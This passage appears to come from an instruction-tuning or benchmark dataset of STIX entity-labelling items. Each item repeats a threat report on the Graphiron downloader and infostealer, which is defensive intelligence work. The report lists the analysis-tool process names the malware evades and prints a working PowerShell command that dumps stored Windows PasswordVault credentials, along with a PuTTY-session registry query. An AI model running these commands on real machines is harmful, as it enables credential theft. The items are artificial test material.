"input": "### Entity:\ndbgview\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSysInspector\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ndisassembly\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\npslist\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nautoruns\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nhttpsMon\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nMicrosoftOfficeDashboard.exe\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
